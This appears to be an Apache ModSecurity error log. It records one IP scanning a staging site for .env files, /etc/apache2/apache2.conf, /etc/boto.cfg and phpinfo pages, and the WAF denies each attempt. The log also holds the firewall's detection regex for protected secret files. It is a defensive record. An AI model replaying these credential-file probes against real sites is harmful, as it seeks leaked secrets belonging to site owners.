[Tue May 26 15:30:51.868083 2026] [security2:error] [pid 715645:tid 715693] [remote 195.178.110.199:53592] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/demo/.env"] [unique_id "ahVvU3VGgMGh8k213RgOGwAAAy8"]
[Tue May 26 15:30:51.879175 2026] [security2:error] [pid 715645:tid 715901] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvU3VGgMGh8k213RgOFAAAAH4"]
[Tue May 26 15:30:51.896938 2026] [security2:error] [pid 715645:tid 715778] [client 195.178.110.199:53592] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvU3VGgMGh8k213RgOFQAAA1A"]
[Tue May 26 15:30:51.901299 2026] [security2:error] [pid 715645:tid 715683] [remote 195.178.110.199:53592] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/dev/.env"] [unique_id "ahVvU3VGgMGh8k213RgOHgAAAyU"]
[Tue May 26 15:30:51.905156 2026] [security2:error] [pid 715645:tid 715676] [remote 195.178.110.199:53592] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/develop/.env"] [unique_id "ahVvU3VGgMGh8k213RgOIQAAAx4"]
[Tue May 26 15:30:51.908954 2026] [security2:error] [pid 715645:tid 715822] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvU3VGgMGh8k213RgOHAAAAC8"]
[Tue May 26 15:30:51.934906 2026] [security2:error] [pid 715645:tid 715754] [remote 195.178.110.199:53592] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/developer/.env"] [unique_id "ahVvU3VGgMGh8k213RgOIgAAA2w"]
[Tue May 26 15:30:51.946086 2026] [security2:error] [pid 715645:tid 715778] [client 195.178.110.199:53592] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvU3VGgMGh8k213RgOIAAAAy4"]
[Tue May 26 15:30:51.974433 2026] [security2:error] [pid 715645:tid 715662] [remote 195.178.110.199:53592] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/development/.env"] [unique_id "ahVvU3VGgMGh8k213RgOJAAAAxA"]
[Tue May 26 15:30:51.980669 2026] [security2:error] [pid 715645:tid 715850] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvU3VGgMGh8k213RgOIwAAAEs"]
[Tue May 26 15:30:52.026876 2026] [security2:error] [pid 715645:tid 715847] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvU3VGgMGh8k213RgOKQAAAEg"]
[Tue May 26 15:30:52.042597 2026] [security2:error] [pid 715645:tid 715876] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvU3VGgMGh8k213RgOLAAAAGU"]
[Tue May 26 15:30:52.066401 2026] [security2:error] [pid 715645:tid 715778] [client 195.178.110.199:53592] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvVHVGgMGh8k213RgOLwAAAx0"]
[Tue May 26 15:30:52.175154 2026] [security2:error] [pid 715645:tid 715684] [remote 195.178.110.199:53592] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/erp/.env"] [unique_id "ahVvVHVGgMGh8k213RgOXgAAAyY"]
[Tue May 26 15:30:52.213289 2026] [security2:error] [pid 715645:tid 715742] [remote 195.178.110.199:53592] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/etc/"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/etc/apache2/apache2.conf"] [unique_id "ahVvVHVGgMGh8k213RgOYQAAA2A"]
[Tue May 26 15:30:52.287932 2026] [security2:error] [pid 715645:tid 715873] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvVHVGgMGh8k213RgOOgAAAGI"]
[Tue May 26 15:30:52.290190 2026] [security2:error] [pid 715645:tid 715834] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvVHVGgMGh8k213RgOOwAAADs"]
[Tue May 26 15:30:52.309764 2026] [security2:error] [pid 715645:tid 715803] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvVHVGgMGh8k213RgONwAAABw"]
[Tue May 26 15:30:52.310906 2026] [security2:error] [pid 715645:tid 715890] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvVHVGgMGh8k213RgOPwAAAHM"]
[Tue May 26 15:30:52.313958 2026] [security2:error] [pid 715645:tid 715868] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvVHVGgMGh8k213RgOSgAAAF0"]
[Tue May 26 15:30:52.322290 2026] [security2:error] [pid 715645:tid 715732] [remote 195.178.110.199:53592] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/etc/"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/etc/boto.cfg"] [unique_id "ahVvVHVGgMGh8k213RgOaQAAA1Y"]
[Tue May 26 15:30:52.324551 2026] [security2:error] [pid 715645:tid 715836] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvVHVGgMGh8k213RgOVAAAAD0"]
[Tue May 26 15:30:52.334837 2026] [security2:error] [pid 715645:tid 715844] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvVHVGgMGh8k213RgONgAAAEU"]
[Tue May 26 15:30:52.335215 2026] [security2:error] [pid 715645:tid 715778] [client 195.178.110.199:53592] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvVHVGgMGh8k213RgOUAAAAwU"]
[Tue May 26 15:30:52.336774 2026] [security2:error] [pid 715645:tid 715861] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvVHVGgMGh8k213RgOWgAAAFY"]
[Tue May 26 15:30:52.337135 2026] [security2:error] [pid 715645:tid 715895] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvVHVGgMGh8k213RgOYgAAAHg"]
[Tue May 26 15:30:52.339759 2026] [security2:error] [pid 715645:tid 715778] [client 195.178.110.199:53592] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvVHVGgMGh8k213RgOUQAAA2Q"]
[Tue May 26 15:30:52.341541 2026] [security2:error] [pid 715645:tid 715786] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvVHVGgMGh8k213RgOTAAAAAs"]
[Tue May 26 15:30:52.343953 2026] [security2:error] [pid 715645:tid 715883] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvVHVGgMGh8k213RgOXQAAAGw"]
[Tue May 26 15:30:52.356220 2026] [security2:error] [pid 715645:tid 715858] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvVHVGgMGh8k213RgOSwAAAFM"]
[Tue May 26 15:30:52.360425 2026] [security2:error] [pid 715645:tid 715698] [remote 195.178.110.199:53592] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/fe/.env"] [unique_id "ahVvVHVGgMGh8k213RgOagAAODQ"]
[Tue May 26 15:30:52.397407 2026] [security2:error] [pid 715645:tid 715887] [client 195.2.71.225:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVvVHVGgMGh8k213RgOaAAAAHA"], referer: https://anujtradingco.com/top-deejay-headphones/?unapproved=1230859&moderation-hash=2aac02f82ca332a981ba185237eedd5a
[Tue May 26 15:30:52.444891 2026] [security2:error] [pid 715645:tid 715800] [client 57.141.2.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVvU3VGgMGh8k213RgOLQAAABk"]
[Tue May 26 15:30:52.460597 2026] [security2:error] [pid 715645:tid 715699] [remote 195.178.110.199:53592] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/front/.env"] [unique_id "ahVvVHVGgMGh8k213RgOcAAAdDU"]
[Tue May 26 15:30:52.469788 2026] [security2:error] [pid 715645:tid 715682] [remote 195.178.110.199:53592] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/frontend/.env"] [unique_id "ahVvVHVGgMGh8k213RgOdgAAdCQ"]
[Tue May 26 15:30:52.490404 2026] [security2:error] [pid 715645:tid 715730] [remote 195.178.110.199:53592] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.staging.unsobered.com"] [uri "/info.php"] [unique_id "ahVvVHVGgMGh8k213RgOhQAAdFQ"]
[Tue May 26 15:30:52.503835 2026] [security2:error] [pid 715645:tid 715653] [remote 195.178.110.199:53592] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.staging.unsobered.com"] [uri "/infophp.php"] [unique_id "ahVvVHVGgMGh8k213RgOjQAAdAc"]
[Tue May 26 15:30:52.508899 2026] [security2:error] [pid 715645:tid 715766] [remote 195.178.110.199:53592] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.staging.unsobered.com"] [uri "/infos.php"] [unique_id "ahVvVHVGgMGh8k213RgOjgAAdHg"]
[Tue May 26 15:30:52.512861 2026] [security2:error] [pid 715645:tid 715829] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvVHVGgMGh8k213RgOdwAAADY"]
[Tue May 26 15:30:52.514639 2026] [security2:error] [pid 715645:tid 715871] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvVHVGgMGh8k213RgOdAAAAGA"]
[Tue May 26 15:30:52.520354 2026] [security2:error] [pid 715645:tid 715862] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvVHVGgMGh8k213RgOdQAAAFc"]
[Tue May 26 15:30:52.523754 2026] [security2:error] [pid 715645:tid 715822] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvVHVGgMGh8k213RgOeAAAAC8"]
[Tue May 26 15:30:52.538326 2026] [security2:error] [pid 715645:tid 715891] [client 195.178.110.199:53592] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvVHVGgMGh8k213RgOhAAAdEU"]
[Tue May 26 15:30:52.542705 2026] [security2:error] [pid 715645:tid 715847] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvVHVGgMGh8k213RgOigAAAEg"]
[Tue May 26 15:30:52.548359 2026] [security2:error] [pid 715645:tid 715775] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvVHVGgMGh8k213RgOhwAAAAA"]
[Tue May 26 15:30:52.549374 2026] [security2:error] [pid 715645:tid 715827] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvVHVGgMGh8k213RgOjAAAADQ"]
[Tue May 26 15:30:52.549768 2026] [security2:error] [pid 715645:tid 715885] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvVHVGgMGh8k213RgOiQAAAG4"]
[Tue May 26 15:30:52.555087 2026] [security2:error] [pid 715645:tid 715889] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvVHVGgMGh8k213RgOiwAAAHI"]
[Tue May 26 15:30:52.555911 2026] [security2:error] [pid 715645:tid 715855] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvVHVGgMGh8k213RgOiAAAAFA"]
[Tue May 26 15:30:52.636990 2026] [security2:error] [pid 715645:tid 715703] [remote 195.178.110.199:53592] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/laravel/.env"] [unique_id "ahVvVHVGgMGh8k213RgOmwAAUTk"]
[Tue May 26 15:30:52.650903 2026] [security2:error] [pid 715645:tid 715770] [remote 195.178.110.199:53592] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/lms/.env"] [unique_id "ahVvVHVGgMGh8k213RgOnAAAUXw"]
[Tue May 26 15:30:52.662017 2026] [security2:error] [pid 715645:tid 715650] [remote 195.178.110.199:53592] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/local/.env"] [unique_id "ahVvVHVGgMGh8k213RgOnwAAUQQ"]
[Tue May 26 15:30:52.663986 2026] [security2:error] [pid 715645:tid 715795] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvVHVGgMGh8k213RgOmAAAABQ"]
[Tue May 26 15:30:52.664661 2026] [security2:error] [pid 715645:tid 715864] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvVHVGgMGh8k213RgOmgAAAFk"]
[Tue May 26 15:30:52.685218 2026] [security2:error] [pid 715645:tid 715739] [remote 195.178.110.199:53592] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/market/.env"] [unique_id "ahVvVHVGgMGh8k213RgOqgAAUV0"]
[Tue May 26 15:30:52.690220 2026] [security2:error] [pid 715645:tid 715734] [remote 195.178.110.199:53592] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/marketing/.env"] [unique_id "ahVvVHVGgMGh8k213RgOqwAAUVg"]
